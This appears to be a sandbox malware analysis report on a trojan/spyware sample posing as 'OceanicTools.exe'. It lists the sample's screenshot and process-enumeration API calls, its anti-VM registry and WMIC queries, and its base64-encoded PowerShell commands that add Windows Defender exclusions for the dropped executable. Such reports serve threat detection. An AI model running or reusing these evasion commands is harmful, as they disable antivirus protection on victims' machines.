Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E3F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673411537.000001FB139F3000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FEE000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A92000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A45000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A9A000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C88000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E47000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2673160053.000001FB12C80000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC8000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A3D000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49963 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007D6E0 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 14_2_000000014007D6E0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6696, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D46A4 CreateToolhelp32Snapshot,Process32First,Process32Next,NtClose, 11_2_00007FF6350D46A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3060 GetCurrentProcess,NtQueryInformationProcess,GetTempPathA,strlen,strlen,memcpy, 11_2_00007FF6350D3060
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082030 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize, 14_2_0000000140082030
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06C0 NtQueryObject, 14_2_00000001400D06C0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06D8 NtQuerySystemInformation, 14_2_00000001400D06D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06E8 NtAllocateVirtualMemory, 14_2_00000001400D06E8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400818F0 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,NtDuplicateObject,GetCurrentProcess,NtDuplicateObject,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle, 14_2_00000001400818F0
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848FE42BF 5_2_00007FF848FE42BF
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 11_2_00007FF6350D3C70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D34D0 11_2_00007FF6350D34D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D6A40 11_2_00007FF6350D6A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D7290 11_2_00007FF6350D7290
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EDA84 11_2_00007FF6350EDA84
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350E5B20 11_2_00007FF6350E5B20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350F5140 11_2_00007FF6350F5140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6351CC950 11_2_00007FF6351CC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6351B7220 11_2_00007FF6351B7220
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EC4A0 11_2_00007FF6350EC4A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350F64F0 11_2_00007FF6350F64F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350ED367 11_2_00007FF6350ED367
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008A06A 14_2_000000014008A06A
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014005F140 14_2_000000014005F140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400421C0 14_2_00000001400421C0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007F210 14_2_000000014007F210
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008426B 14_2_000000014008426B
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400743A0 14_2_00000001400743A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007E3D0 14_2_000000014007E3D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002F650 14_2_000000014002F650
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140086680 14_2_0000000140086680
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007D6E0 14_2_000000014007D6E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003B740 14_2_000000014003B740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003C7E0 14_2_000000014003C7E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140094B74 14_2_0000000140094B74
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140076BA0 14_2_0000000140076BA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007FBA0 14_2_000000014007FBA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003ABE0 14_2_000000014003ABE0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009ACF0 14_2_000000014009ACF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140084CF0 14_2_0000000140084CF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007CDF0 14_2_000000014007CDF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003CE80 14_2_000000014003CE80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002EF60 14_2_000000014002EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009DFA0 14_2_000000014009DFA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006E000 14_2_000000014006E000
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004E000 14_2_000000014004E000
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082030 14_2_0000000140082030
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A7038 14_2_00000001400A7038
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140036050 14_2_0000000140036050
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006B0A0 14_2_000000014006B0A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092094 14_2_0000000140092094
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007E0B0 14_2_000000014007E0B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400300C6 14_2_00000001400300C6
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A100 14_2_000000014006A100
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003A110 14_2_000000014003A110
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006180 14_2_0000000140006180
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140028200 14_2_0000000140028200
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009E21C 14_2_000000014009E21C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140055250 14_2_0000000140055250
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009227C 14_2_000000014009227C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B92E0 14_2_00000001400B92E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400532E0 14_2_00000001400532E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A22D8 14_2_00000001400A22D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140096300 14_2_0000000140096300
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140056340 14_2_0000000140056340
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140026340 14_2_0000000140026340
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140093344 14_2_0000000140093344
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140025350 14_2_0000000140025350
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082380 14_2_0000000140082380
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008E38C 14_2_000000014008E38C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A400 14_2_000000014006A400
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A5464 14_2_00000001400A5464
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092464 14_2_0000000140092464
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009C498 14_2_000000014009C498
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006E49A 14_2_000000014006E49A
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004C500 14_2_000000014004C500
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140062510 14_2_0000000140062510
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400705A0 14_2_00000001400705A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006610 14_2_0000000140006610
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400596B0 14_2_00000001400596B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A730 14_2_000000014006A730
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140066750 14_2_0000000140066750
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400907A0 14_2_00000001400907A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A37AC 14_2_00000001400A37AC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009E7A4 14_2_000000014009E7A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008E884 14_2_000000014008E884
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009B968 14_2_000000014009B968
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400269E0 14_2_00000001400269E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140078A40 14_2_0000000140078A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006AA50 14_2_000000014006AA50
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092AAC 14_2_0000000140092AAC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140037AAD 14_2_0000000140037AAD
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A6ACC 14_2_00000001400A6ACC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A1B68 14_2_00000001400A1B68
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400BBB80 14_2_00000001400BBB80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006DBC0 14_2_000000014006DBC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002FC80 14_2_000000014002FC80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006D20 14_2_0000000140006D20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004AD30 14_2_000000014004AD30
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140066D53 14_2_0000000140066D53
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006AD70 14_2_000000014006AD70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140005DB0 14_2_0000000140005DB0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009BE18 14_2_000000014009BE18
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006CE40 14_2_000000014006CE40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140075E70 14_2_0000000140075E70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140072EC0 14_2_0000000140072EC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009CF18 14_2_000000014009CF18
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140038FB0 14_2_0000000140038FB0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D7290 14_2_00007FF6350D7290
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350F5140 14_2_00007FF6350F5140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6351B7220 14_2_00007FF6351B7220
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EC4A0 14_2_00007FF6350EC4A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D34D0 14_2_00007FF6350D34D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350F64F0 14_2_00007FF6350F64F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350ED367 14_2_00007FF6350ED367
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D6A40 14_2_00007FF6350D6A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EDA84 14_2_00007FF6350EDA84
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350E5B20 14_2_00007FF6350E5B20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6351CC950 14_2_00007FF6351CC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D3C70 14_2_00007FF6350D3C70
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll 3FB6B027285DB00651F0257DF8F5CA9DB5665A24A5E23F476CD3E71244BFBC7F
Found potential string decryption / allocating functions
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00007FF6351D2CD0 appears 32 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 0000000140034B20 appears 41 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00007FF6351DC0A0 appears 40 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00000001400300A0 appears 67 times
PE file contains more sections than normal
Source: qflwedtkihuzyxlg.exe_a.dll.11.dr Static PE information: Number of sections : 11 > 10
Uses reg.exe to modify the Windows registry
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6696, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: OceanicTools.exe Binary string: \\.\\\?\\Device\UNC\\\%ls%ls%lsccs=UNICODEccs=UTF-8ccs=UTF-16LE
Source: OceanicTools.exe Binary string: X@tdiv_qr.cqxn == 0n2p[qn] >= cy2rn == dnData.Hashable.LowLevelhashable-1.4.4.0-1jOpKawyX4k1n9a6vQlXXi'OsCharOsChar'OsStringOsString'PosixCharPosixChar'WindowsCharWindowsChar'PosixString'WindowsStringPosixStringSystem.OsString.Internal.Typesos-string-2.0.6-IlBa2UQjH7mL18YjMu1jzEWindowsString\\.\\\?\\Device\UNC\\\%ls%ls%lsccs=UNICODEccs=UTF-8ccs=UTF-16LE@
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/12@1/3
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400835B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 14_2_00000001400835B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D46A4 CreateToolhelp32Snapshot,Process32First,Process32Next,NtClose, 11_2_00007FF6350D46A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D0730 CoCreateInstance, 14_2_00000001400D0730
Source: C:\Users\user\Desktop\OceanicTools.exe File created: C:\Users\user\foekseyrkkzyooxy Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Mutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E69639EDEC077
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ok5tzepb.rs5.ps1 Jump to behavior
Source: OceanicTools.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: OceanicTools.exe String found in binary or memory: --install-signal-handlers=<yes|no>
Source: OceanicTools.exe String found in binary or memory: --install-seh-handlers=<yes|no>
Source: OceanicTools.exe String found in binary or memory: to be installed. Implies --install-signal-handlers=yes.
Source: OceanicTools.exe String found in binary or memory: in-addr
Source: unknown Process created: C:\Users\user\Desktop\OceanicTools.exe "C:\Users\user\Desktop\OceanicTools.exe"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
